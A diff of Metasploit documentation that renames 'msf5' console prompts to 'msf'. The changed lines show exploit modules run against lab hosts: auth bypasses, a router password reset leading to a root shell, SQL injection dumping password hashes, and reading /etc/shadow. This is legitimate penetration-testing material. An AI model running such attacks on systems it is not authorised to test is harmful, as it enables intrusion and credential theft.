diff --git a/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md b/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md index 382a1d9868..7554325598 100644 --- a/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md +++ b/docs/metasploit-framework.wiki/Hashes-and-Password-Cracking.md @@ -18,7 +18,7 @@ puts identify_hash "_9G..8147mpcfKT8g0U." ``` In practice, we receive the following output from this: ```ruby -msf5 > irb +msf > irb [*] Starting IRB shell... [*] You are in the "framework" object diff --git a/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md b/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md index 879e6aed58..11fac27ced 100644 --- a/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md +++ b/docs/metasploit-framework.wiki/How-to-get-Oracle-Support-working-with-Kali-Linux.md @@ -12,7 +12,7 @@ msf auxiliary(oracle_login) > run ``` or ```msf -msf5 auxiliary(scanner/oracle/oracle_hashdump) > run +msf auxiliary(scanner/oracle/oracle_hashdump) > run [-] Failed to load the OCI library: cannot load such file -- oci8 [-] Try 'gem install ruby-oci8' diff --git a/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md b/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md index 5db713e0f8..3b65ce6f35 100644 --- a/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md +++ b/docs/metasploit-framework.wiki/Metasploit-URL-support-proposal.md @@ -61,7 +61,7 @@ When the user views the options for a given module, it will be consolidated. The Multiple options are available for configuring the module options: ```msf -msf5 exploit(multi/http/tomcat_mgr_upload) > options +msf exploit(multi/http/tomcat_mgr_upload) > options Module options (exploit/multi/http/tomcat_mgr_upload): @@ -88,7 +88,7 @@ Exploit target: Multiple options are consolidated into a single TARGETS field: ```msf -msf5 exploit(multi/http/tomcat_mgr_upload) > options +msf exploit(multi/http/tomcat_mgr_upload) > options Module options (exploit/multi/http/tomcat_mgr_upload): diff --git a/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md b/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md index c8e9346951..9bd4dbad63 100644 --- a/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md +++ b/docs/metasploit-framework.wiki/Work-needed-to-allow-msfdb-to-use-postgresql-common.md @@ -163,7 +163,7 @@ Start `msfconsole` and verify postgresql connection using the `db_status` comman mv ~/.msf4/config ~/.msf4/config.disable ./msfconsole ... -msf5 > db_status +msf > db_status [*] Connected to msf. Connection type: postgresql. ``` @@ -171,4 +171,4 @@ Drop (delete) the cluster: ``` PG_CLUSTER_CONF_ROOT=$HOME/.local/etc/postgresql pg_dropcluster 9.6 msf -``` \ No newline at end of file +``` diff --git a/documentation/cli/msfconsole/jobs.md b/documentation/cli/msfconsole/jobs.md index 1f07db9ec5..ed8758feda 100644 --- a/documentation/cli/msfconsole/jobs.md +++ b/documentation/cli/msfconsole/jobs.md @@ -81,12 +81,12 @@ Examples Starting a module as a job: - msf5 exploit(multi/handler) > run -j + msf exploit(multi/handler) > run -j [*] Exploit running as background job 1. A verbose listing of all the jobs: - msf5 exploit(multi/handler) > jobs -v + msf exploit(multi/handler) > jobs -v Jobs ==== @@ -97,16 +97,16 @@ A verbose listing of all the jobs: Set some jobs to be started on `msfconsole` start: - msf5 exploit(multi/handler) > jobs -p 1-2 + msf exploit(multi/handler) > jobs -p 1-2 Added persistence to job 1. Added persistence to job 2. Getting information about a specific job: - msf5 exploit(multi/handler) > jobs -i 1 + msf exploit(multi/handler) > jobs -i 1 Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600 - msf5 exploit(multi/handler) > jobs -i 1 -v + msf exploit(multi/handler) > jobs -i 1 -v Name: Generic Payload Handler, started at 2019-02-20 19:03:19 -0600 diff --git a/documentation/cli/msfconsole/repeat.md b/documentation/cli/msfconsole/repeat.md index 455bc8802b..e00543cb6c 100644 --- a/documentation/cli/msfconsole/repeat.md +++ b/documentation/cli/msfconsole/repeat.md @@ -30,8 +30,8 @@ Examples Run the heartbleed module every 10 seconds against a server for an hour: - msf5 > use auxiliary/scanner/ssl/openssl_heartbleed - msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP + msf > use auxiliary/scanner/ssl/openssl_heartbleed + msf auxiliary(scanner/ssl/openssl_heartbleed) > set ACTION DUMP # Set other options... - msf5 auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10 + msf auxiliary(scanner/ssl/openssl_heartbleed) > repeat -t 3600 run; sleep 10 diff --git a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md index 6d5577fae5..52f896b87b 100644 --- a/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md +++ b/documentation/modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.md @@ -38,14 +38,14 @@ The desired username for setting SSH access #### Successful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. @@ -55,7 +55,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(linux/ssh/cve_2020_16137) > exit +msf auxiliary(linux/ssh/cve_2020_16137) > exit user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 test@192.168.110.209's password: @@ -225,14 +225,14 @@ $>exit #### Unsuccessful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. @@ -246,14 +246,14 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run #### Successful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. @@ -263,7 +263,7 @@ msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed -msf5 auxiliary(linux/ssh/cve_2020_16137) > exit +msf auxiliary(linux/ssh/cve_2020_16137) > exit user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209 test@192.168.110.209's password: @@ -433,14 +433,14 @@ $>exit #### Unsuccessful Scenario ``` -msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test +msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test user => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test pass => test -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209 rhosts => 192.168.110.209 -msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run +msf auxiliary(admin/http/cisco_7937g_ssh_privesc) > run [*] Running for 192.168.110.209... [*] 192.168.110.209 - Attempting to set SSH credentials. diff --git a/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md b/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md index 73fe564999..5dd0dc4c28 100644 --- a/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md +++ b/documentation/modules/auxiliary/admin/http/grafana_auth_bypass.md @@ -22,8 +22,8 @@ The following list shows the vulnerable versions of Grafana when configured for Example run against Grafana 3.x with username admin: ``` -msf5 > use auxiliary/admin/http/grafana_auth_bypass -msf5 auxiliary(admin/http/grafana_auth_bypass) > show options +msf > use auxiliary/admin/http/grafana_auth_bypass +msf auxiliary(admin/http/grafana_auth_bypass) > show options Module options (auxiliary/admin/http/grafana_auth_bypass): @@ -38,11 +38,11 @@ Module options (auxiliary/admin/http/grafana_auth_bypass): USERNAME no Valid username VERSION 5 yes Grafana version: "2-4" or "5" (Accepted: 2-4, 5) -msf5 auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3 +msf auxiliary(admin/http/grafana_auth_bypass) > set RHOSTS 192.168.202.3 RHOSTS => 192.168.202.3 -msf5 auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator +msf auxiliary(admin/http/grafana_auth_bypass) > set USERNAME Administrator USERNAME => Administrator -msf5 auxiliary(admin/http/grafana_auth_bypass) > run +msf auxiliary(admin/http/grafana_auth_bypass) > run [*] Running for 192.168.202.3... [+] Encrypted remember cookie: 1bedc565c40b58307afa4672efd72d3c37f02684c2deb0ce0b55594cbce337fc90625356dc232e998f diff --git a/documentation/modules/auxiliary/admin/http/ibm_drm_download.md b/documentation/modules/auxiliary/admin/http/ibm_drm_download.md index 25a7df5ecb..b4adf83a79 100644 --- a/documentation/modules/auxiliary/admin/http/ibm_drm_download.md +++ b/documentation/modules/auxiliary/admin/http/ibm_drm_download.md @@ -25,7 +25,7 @@ Module defaults work very well, you should just need to set `RHOST` and the `FIL A successful exploit will look like this: ``` -msf5 auxiliary(admin/http/ibm_drm_file_download) > run +msf auxiliary(admin/http/ibm_drm_file_download) > run [+] 10.9.8.213:8443 - Successfully "stickied" our session ID kmhleyPh [+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1 diff --git a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md index 1c1ed53459..1ff803d483 100644 --- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md +++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md @@ -54,8 +54,8 @@ upnpd port on the target. Default 5000. ### Netgear R6700v3 firmware version V1.0.4.84_10.0.58 ``` - msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + msf > use auxiliary/admin/http/netgear_r6700_pass_reset + msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options Module options (auxiliary/admin/http/netgear_r6700_pass_reset): @@ -67,13 +67,13 @@ upnpd port on the target. Default 5000. SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + msf auxiliary(admin/http/netgear_r6700_pass_reset) > check [*] Target is running firmware version 1.0.4.84 [*] 192.168.1.1:5000 - The target appears to be vulnerable. - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit [*] Running module against 192.168.1.1 [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. @@ -93,24 +93,24 @@ upnpd port on the target. Default 5000. [*] 2.7- run it and login with 'admin:' [*] 3- Enjoy your root shell! [*] Auxiliary module execution completed - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > + msf auxiliary(admin/http/netgear_r6700_pass_reset) > ``` Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` session running as `root`, entered the following commands: ``` - msf5 > use exploit/linux/telnet/netgear_telnetenable + msf > use exploit/linux/telnet/netgear_telnetenable [*] No payload configured, defaulting to cmd/unix/interact - msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + msf exploit(linux/telnet/netgear_telnetenable) > set username admin username => admin - msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + msf exploit(linux/telnet/netgear_telnetenable) > set password testing123 password => testing123 - msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 MAC => D56C89FC94C9 - msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1 + msf exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 - msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + msf exploit(linux/telnet/netgear_telnetenable) > exploit [+] 192.168.1.1:23 - Detected telnetenabled on UDP [+] 192.168.1.1:23 - Using creds admin:testing123 @@ -147,8 +147,8 @@ session running as `root`, entered the following commands: ### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57 ``` - msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + msf > use auxiliary/admin/http/netgear_r6700_pass_reset + msf auxiliary(admin/http/netgear_r6700_pass_reset) > show options Module options (auxiliary/admin/http/netgear_r6700_pass_reset): @@ -160,13 +160,13 @@ session running as `root`, entered the following commands: SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + msf auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 RHOSTS => 192.168.1.1 - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + msf auxiliary(admin/http/netgear_r6700_pass_reset) > check [*] Target is running firmware version 1.0.4.82 [*] 192.168.1.1:5000 - The target appears to be vulnerable. - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + msf auxiliary(admin/http/netgear_r6700_pass_reset) > exploit [*] Running module against 192.168.1.1 [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target. @@ -186,16 +186,16 @@ session running as `root`, entered the following commands: [*] 2.7- run it and login with 'admin:' [*] 3- Enjoy your root shell! [*] Auxiliary module execution completed - msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > + msf auxiliary(admin/http/netgear_r6700_pass_reset) > ``` Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` session running as `root`, entered the following commands: ``` - msf5 > use exploit/linux/telnet/netgear_telnetenable + msf > use exploit/linux/telnet/netgear_telnetenable [*] No payload configured, defaulting to cmd/unix/interact - msf5 exploit(linux/telnet/netgear_telnetenable) > show options + msf exploit(linux/telnet/netgear_telnetenable) > show options Module options (exploit/linux/telnet/netgear_telnetenable): @@ -226,15 +226,15 @@ session running as `root`, entered the following commands: 0 Automatic (detect TCP or UDP) - msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1 + msf exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1 RHOST => 192.168.1.1 - set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + set msf exploit(linux/telnet/netgear_telnetenable) > set username admin username => admin - msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + msf exploit(linux/telnet/netgear_telnetenable) > set password testing123 password => testing123 - msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + msf exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 MAC => D56C89FC94C9 - msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + msf exploit(linux/telnet/netgear_telnetenable) > exploit [+] 192.168.1.1:23 - Detected telnetenabled on UDP [+] 192.168.1.1:23 - Using creds admin:testing123 diff --git a/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md b/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md index d51d06a427..2a375abda1 100644 --- a/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md +++ b/documentation/modules/auxiliary/admin/http/supra_smart_cloud_tv_rfi.md @@ -18,12 +18,12 @@ Doo-doodoodoodoodoo-doo, Epic Sax Guy will be broadcasted to the remote system. ## Scenarios ``` -msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132 +msf > use auxiliary/admin/http/supra_smart_cloud_tv_rfi +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132 SRVHOST => 192.168.1.132 -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155 +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155 RHOSTS => 192.168.1.155 -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run [*] Running module against 192.168.1.155 [*] Using URL: http://192.168.1.132:8080/ [*] Broadcasting Epic Sax Guy to 192.168.1.155:80 @@ -31,5 +31,5 @@ msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run [*] Sleeping for 10s serving .m3u8 and .ts files... [*] Server stopped. [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > +msf auxiliary(admin/http/supra_smart_cloud_tv_rfi) > ``` diff --git a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md index 6330a66b89..193fc51d55 100644 --- a/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md +++ b/documentation/modules/auxiliary/admin/http/typo3_news_module_sqli.md @@ -45,5 +45,5 @@ id => 37 [+] Username: admin [+] Password Hash: $P$Ch4lme3.gje9o.DjMip59baG7b/mIp. [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/typo3_news_module_sqli) > +msf auxiliary(admin/http/typo3_news_module_sqli) > ``` diff --git a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md index 4c899443b4..d00fa4cc06 100644 --- a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md +++ b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md @@ -45,20 +45,20 @@ Note: If you are using relative paths, use three periods when traversing down a ### Ulterius Server v1.8.0.0 on Windows 7 SP1 x64. ``` -msf5 > use auxiliary/admin/http/ulterius_file_download -msf5 auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122 +msf > use auxiliary/admin/http/ulterius_file_download +msf auxiliary(admin/http/ulterius_file_download) > set rhost 172.22.222.122 rhost => 172.22.222.122 -msf5 auxiliary(admin/http/ulterius_file_download) > run +msf auxiliary(admin/http/ulterius_file_download) > run [*] Starting to parse fileIndex.db... [*] Remote file paths saved in: filepath0 [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt' +msf auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt' path => C:/users/pwnduser/desktop/tmp.txt -msf5 auxiliary(admin/http/ulterius_file_download) > run +msf auxiliary(admin/http/ulterius_file_download) > run [*] C:/users/pwnduser/desktop/tmp.txt [*] File contents saved: filepath1 [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/ulterius_file_download) > +msf auxiliary(admin/http/ulterius_file_download) > ``` diff --git a/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md b/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md index e5180a5190..3d755beebb 100644 --- a/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md +++ b/documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md @@ -25,24 +25,24 @@ This module changes the admin email (optional) to prevent notification sending, ### Tested on Debian 9.6 running Wordpress 4.7.5 with WordPress GDPR Compliance plugin 1.4.2: ``` -msf5 > use auxiliary/admin/http/wp_gdpr_compliance_privesc -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set verbose true +msf > use auxiliary/admin/http/wp_gdpr_compliance_privesc +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > set verbose true verbose => true -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145 +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145 rhosts => 172.22.222.145 -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email test@example.com +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email test@example.com email => test@example.com -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > check +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > check [*] Checking /wp-content/plugins/wp-gdpr-compliance/readme.txt [*] Found version 1.4.2 of the plugin [*] 172.22.222.145:80 The target appears to be vulnerable. -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit [*] Getting security token from host... [!] Enabling user registrations... [!] Setting the default user role type to administrator... [*] Registering msfuser with email test@example.com [*] Auxiliary module execution completed -msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > +msf auxiliary(admin/http/wp_gdpr_compliance_privesc) > ``` diff --git a/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md b/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md index 9f8809914f..8fd8db2c8a 100644 --- a/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md +++ b/documentation/modules/auxiliary/admin/http/wp_google_maps_sqli.md @@ -23,7 +23,7 @@ Change the table prefix. By default, this option is set to `wp_`. ### wp-google-maps 7.11.17 on WordPress 4.9.5 ``` -msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit +msf auxiliary(admin/http/wp_google_maps_sqli) > exploit [*] Running module against 172.22.222.144 [*] 172.22.222.144:80 - Trying to retrieve the wp_users table... diff --git a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md index 5d41904c6a..fd0a337f6b 100644 --- a/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md +++ b/documentation/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.md @@ -95,13 +95,13 @@ Auxiliary action: View the full module info with the info, or info -d command. -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted] +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set rhosts [redacted] rhosts => [redacted] -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_username msfadmin +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_username msfadmin new_username => msfadmin -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_password msfadmin +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > set new_password msfadmin new_password => msfadmin -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > run [*] Running module against [redacted] not verifying SSL hostname of LDAPS server '[redacted]:636' @@ -145,7 +145,7 @@ vmwpasswordprohibitedpreviouscount: [redacted] [+] Added user msfadmin, so auth bypass was successful! [+] Added user msfadmin to admin group [*] Auxiliary module execution completed -msf5 auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > +msf auxiliary(admin/ldap/vmware_vcenter_vmdir_auth_bypass) > ``` ### VMware vCenter Server 6.7.0.2 virtual appliance on ESXi (not vulnerable target) diff --git a/documentation/modules/auxiliary/admin/networking/brocade_config.md b/documentation/modules/auxiliary/admin/networking/brocade_config.md index a3176c1a21..400717822e 100644 --- a/documentation/modules/auxiliary/admin/networking/brocade_config.md +++ b/documentation/modules/auxiliary/admin/networking/brocade_config.md @@ -150,13 +150,13 @@ File path to the configuration file. ## Scenarios ``` -msf5 > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf -msf5 > use auxiliary/admin/networking/brocade_config -msf5 auxiliary(admin/networking/brocade_config) > set rhosts 127.0.0.1 +msf > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf +msf > use auxiliary/admin/networking/brocade_config +msf auxiliary(admin/networking/brocade_config) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 auxiliary(admin/networking/brocade_config) > set config /tmp/brocade.conf +msf auxiliary(admin/networking/brocade_config) > set config /tmp/brocade.conf config => /tmp/brocade.conf -msf5 auxiliary(admin/networking/brocade_config) > run +msf auxiliary(admin/networking/brocade_config) > run [*] Running module against 127.0.0.1 [*] Importing config diff --git a/documentation/modules/auxiliary/admin/networking/cisco_config.md b/documentation/modules/auxiliary/admin/networking/cisco_config.md index f00ffb00a8..994d7901de 100644 --- a/documentation/modules/auxiliary/admin/networking/cisco_config.md +++ b/documentation/modules/auxiliary/admin/networking/cisco_config.md @@ -37,12 +37,12 @@ root@metasploit-dev:~/metasploit-framework# wget https://raw.githubusercontent.c root@metasploit-dev:~/metasploit-framework# ./msfconsole [*] Starting persistent handler(s)... -msf5 > use auxiliary/admin/networking/cisco_config -msf5 auxiliary(admin/networking/cisco_config) > set config /tmp/LA_EDGE_D.txt +msf > use auxiliary/admin/networking/cisco_config +msf auxiliary(admin/networking/cisco_config) > set config /tmp/LA_EDGE_D.txt config => /tmp/LA_EDGE_D.txt -msf5 auxiliary(admin/networking/cisco_config) > set rhost 127.0.0.1 +msf auxiliary(admin/networking/cisco_config) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 auxiliary(admin/networking/cisco_config) > run +msf auxiliary(admin/networking/cisco_config) > run [*] Running module against 127.0.0.1 [*] Importing config diff --git a/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md b/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md index 4d298f32e3..482fb35154 100644 --- a/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md +++ b/documentation/modules/auxiliary/admin/networking/cisco_dcnm_download.md @@ -21,11 +21,11 @@ work on a few versions below 10.4(2). Only version 11.0(1) requires authenticati Setup RHOST, pick the file to download (FILENAME, default is /etc/shadow) and enjoy! ``` -msf5 exploit > use auxiliary/admin/networking/cisco_dcnm_download +msf exploit > use auxiliary/admin/networking/cisco_dcnm_download -msf5 auxiliary(admin/networking/cisco_dcnm_download) > set rhost 10.75.1.40 +msf auxiliary(admin/networking/cisco_dcnm_download) > set rhost 10.75.1.40 rhost => 10.75.1.40 -msf5 auxiliary(admin/networking/cisco_dcnm_download) > run +msf auxiliary(admin/networking/cisco_dcnm_download) > run [+] 10.75.1.40:443 - Detected DCNM 10.4(2) [*] 10.75.1.40:443 - No authentication required, ready to exploit! diff --git a/documentation/modules/auxiliary/admin/networking/juniper_config.md b/documentation/modules/auxiliary/admin/networking/juniper_config.md index 6d71b57140..fc9330990d 100644 --- a/documentation/modules/auxiliary/admin/networking/juniper_config.md +++ b/documentation/modules/auxiliary/admin/networking/juniper_config.md @@ -1037,12 +1037,12 @@ root@metasploit-dev:~/metasploit-framework# wget -o /dev/null -O 